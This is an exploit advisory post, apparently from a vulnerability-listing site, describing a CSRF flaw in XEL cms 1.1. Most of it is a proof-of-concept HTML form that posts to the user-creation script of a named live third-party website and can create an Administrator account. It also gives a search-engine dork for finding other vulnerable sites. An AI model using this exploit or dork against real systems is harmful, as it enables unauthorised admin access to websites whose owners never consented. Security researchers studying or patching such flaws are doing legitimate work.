XEL cms© v. 1.1 CSRF Vulnerability

2021.11.16
dz indoushka (DZ) dz
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: "contact at: +91-98144 06799, z91-161-2408274 email: info@cyberxel.com"

==================================================================================================================================== | # Title : XEL cms© v. 1.1 CSRF Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) | | # Vendor : https://cyberxel.com | | # Dork : "contact at: +91-98144 06799, z91-161-2408274 email: info@cyberxel.com" | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] save code as poc.html <style> @import 'http://cyberxel.com/xelcms/styles/main.css'; #form1 table { font-size: 12px; } </style><link href="http://cyberxel.com/xelcms/fckeditor/_samples/sample.css" rel="stylesheet" type="text/css" /><span class=td><img src="http://cyberxel.com/xelcms/dzimages/arrowpath.gif" />&nbsp;<a href="users.php" class=td>Users</a> <img src="http://cyberxel.com/xelcms//dzimages/arrowpath2.gif" />&nbsp;Add user</h2> </span><br><br><form id="form1" name="form1" method="post" action="http://www.sikhsinscotland.org/xelcms/user/adduser.php"> <table width="99%" border="0" cellpadding="2" cellspacing="2"> <tr> <td width="8%">Username:</td> <td width="92%"><label> <input name="username" type="text" id="username" style="font-size: 10px;width:300" /> </label></td> </tr> <tr> <td>Password:</td> <td><label> <input name="password" type="password" id="password" style="font-size: 10px;width:300" /> </label></td> </tr> <tr> <td>Confirm password:</td> <td><label> <input name="password2" type="password" id="password2" style="font-size: 10px;width:300" /> </label></td> </tr> <tr> <td>Type:</td> <td><label> <select name="type" id="type" style="font-size: 10px;width:300"> <option value="" selected></option> <option value="Administrator">Administrator</option> <option value="User">User</option> </select> </label></td> </tr> <tr> <td>&nbsp;</td> <td> <input type="submit" name="Submit" value="Create user" style="font-size: 10px;" /> </td> </tr> </table> </form> [+] Admin Panel : /xelcms/ Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | | =======================================================================================================================================


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top